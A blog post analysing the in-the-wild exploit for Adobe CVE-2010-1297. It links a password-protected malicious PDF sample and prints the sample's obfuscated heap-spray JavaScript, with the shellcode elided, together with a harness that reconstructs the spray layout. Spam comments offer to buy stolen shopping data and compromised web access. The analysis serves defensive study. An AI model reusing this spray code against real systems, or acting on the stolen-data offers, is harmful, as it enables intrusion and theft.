The inside story of that Adobe hole, CVE-2010-1297

Adobe recently published a security advisory stating that Flash Player, Adobe Reader and Acrobat contain a critical vulnerability (CVE-2010-1297) that can crash the application or let an attacker take control of the affected system; Adobe says it has received reports of the hole being exploited in the wild. Adobe has not yet shipped an official fix, but the Flash Player 10.1 Release Candidate is not affected, so users can install that or apply the temporary workarounds from the advisory to stay out of reach of the vulnerability.


================================================================

PDF sample (archive password: friddy):

[download link]

=======================================================================

Extracting the JavaScript inside, it looks like this one was "not the work of our compatriots":

Readers, look closely!~~! Pay special attention to the "fourth line"

var p = unescape;
var len = "\x6c\x65\x6e\x67\x74\x68";   // "length", hex-escaped to hide the property name
// a(): turn a hex string into %uXXXX form for unescape, e.g. "0c0c0c0c" -> "%u0c0c%u0c0c"
function a(__){var _='';for(var ___=0;___<__[len];___+=4) _+='%'+'u'+__.substr(___,4);return _;}
var sb="uismhtsmfvotro,[svystr,ptpmd";   // never used anywhere; this is the "fourth line" the post points at
function s()
{
c = unescape(a("0c0c0c0c"));                          // sled unit 0x0c0c, the same value the spray targets (0x0c0c0c0c)
while(c[len] + 20 + 8 < 0x10000) c = c + c;           // double the sled; stops at 0x10000 UTF-16 units (128 KiB)
b = c["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,(0x0c0c-0x24)/2);   // "substring": 0x0c0c-0x24 bytes of leading sled (1524 units)
b += p(a("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"));  // then the shellcode (elided from this page)
b += c;                                               // then trailing sled
d = b["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,0x10000/2);           // one 64 KiB pattern: sled, shellcode, sled
while(d[len] < 0x80000) d+=d;                         // replicate the pattern to 0x80000 units = 1 MiB
_3 = d["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,0x80000-(0x1020-0x08)/2);  // trim so block plus string overhead fits a 1 MiB allocation
_4 = new Array();
for(i=0;i<0x1f0;i=i+1) _4[i] = _3 + "s";              // 0x1f0 = 496 blocks (~496 MiB); the + "s" makes each entry its own copy, not a reference to _3
}
s();
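To see the geometry this spray produces without running the payload, here is an added analysis harness (written for this edit, not part of the original sample). It rebuilds the block exactly as s() does, with a constructed four-byte int3 placeholder (0xcc) standing in for the elided shellcode, and classifies what the target address 0x0c0c0c0c hits. The data base 0x0c000024 used in the usage line is an assumption, a string whose data starts 0x24 bytes into a 64 KiB-aligned chunk; it is there to show why the script subtracts 0x24 from the sled length.

```javascript
// Added analysis harness (not from the original sample): rebuilds one spray
// block deterministically and reports where the payload sits inside it.
// Sizes are JavaScript UTF-16 code units (2 bytes each), as in the sample.

// Same transform as the sample's a(): "0c0c0c0c" -> "%u0c0c%u0c0c"
function hexToPercentU(hex) {
  let out = '';
  for (let i = 0; i < hex.length; i += 4) out += '%u' + hex.substr(i, 4);
  return out;
}

// Rebuild one spray block the way s() does; shellcodeHex is a stand-in for
// the elided payload. Returns the block and its geometry.
function buildSprayBlock(shellcodeHex) {
  let c = unescape(hexToPercentU('0c0c0c0c'));      // two 0x0c0c units
  while (c.length + 20 + 8 < 0x10000) c = c + c;    // doubles up to 0x10000 units
  let b = c.substring(0, (0x0c0c - 0x24) / 2);      // leading sled: 0x0c0c-0x24 bytes
  const shellcodeStart = b.length;                  // payload offset, in units
  b += unescape(hexToPercentU(shellcodeHex));
  const shellcodeEnd = b.length;
  b += c;                                           // trailing sled
  let d = b.substring(0, 0x10000 / 2);              // one 64 KiB pattern
  while (d.length < 0x80000) d += d;                // 16 repeats = 1 MiB
  const block = d.substring(0, 0x80000 - (0x1020 - 0x08) / 2);
  return {
    block,
    shellcodeStart,
    shellcodeEnd,
    periodBytes: 0x10000,                           // the pattern repeats every 64 KiB
    blockBytes: block.length * 2,
  };
}

// Classify what a target address lands on, given the address at which this
// block's string data begins (dataBase). Only the offset modulo the 64 KiB
// period matters, because the pattern is repeated verbatim.
function classifyAddress(addr, dataBase, g) {
  const delta = addr - dataBase;
  if (delta < 0 || delta >= g.blockBytes) return 'outside';
  const off = delta % g.periodBytes;
  if (off < g.shellcodeStart * 2) return 'sled';
  if (off < g.shellcodeEnd * 2) return 'shellcode';
  return 'sled';
}

// Usage: constructed placeholder payload (four int3 bytes); assumed data base
// 0x0c000024, i.e. string data 0x24 bytes past a 64 KiB-aligned boundary.
const geometry = buildSprayBlock('cccccccc');
console.log('block bytes:', geometry.blockBytes,
            '| payload at unit', geometry.shellcodeStart,
            '| 0x0c0c0c0c hits:', classifyAddress(0x0c0c0c0c, 0x0c000024, geometry));
```

With the assumed base, 0x0c0c0c0c lands exactly on the first payload byte (offset 0x0c0c minus the 0x24 header equals the sled length the script chose); shift the base by 0x24 and the same address falls into the trailing sled instead, which is what the 64 KiB repetition and the 0x0c0c sled units are there to absorb.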

Further reading:

http://blogs.adobe.com/asset/2009/12/fuzzing_reader_-_lessons_learned.html



[This entry was edited by friddy on 2010-06-09 08:55 AM]
Source: original to this site
Comments: 14 | Trackbacks: 0 | Views: 21105
Dominic [2016-09-03 00:34 AM]:
With this, without your actually knowing about it, you may have some illicit images and information stored in the computer. As you can see from the screenshot below, we can choose to delete specific information types, or all types at the same time.
Ermelinda [2016-08-29 10:08 AM]:
1", the hard drives go from 120 GB to 320 GB of RAM from 1 GB to 4 GB. The components of an uninstaller typically include the following: - Uninstaller: a program remover reverses the modifications that the program made during installation. As you can see from the screenshot below, we can choose to delete specific information types, or all types at the same time.
Leanna [2016-04-02 10:47 AM]:
Thanks a lot for your internet site, it helps a lot.
zhangjiantao [2012-06-04 07:05 PM]:
A coincidence after the confusion
31876174 [2010-12-17 01:14 PM]:
Buying stock traffic. If you have stock shells, QQ 643999413
免费开店 [2010-11-28 01:34 PM]:
| Borrowing the blogger's space! Wishing the blog ever more popularity |
收台湾购物数据 [2010-10-29 02:14 PM]:
Paying top prices for Taiwan shopping data; looking for a contact who can set up a stable supply relationship! QQ:869126838
df [2010-07-13 05:58 PM]:
Heh heh.... sb="TMD,[CAO,MM";
中国最大的购物导航 [2010-07-03 11:53 PM]:
China's largest shopping navigation www.178wzlt.com
sdh [2010-06-13 11:53 AM]:
Has anyone above had it work?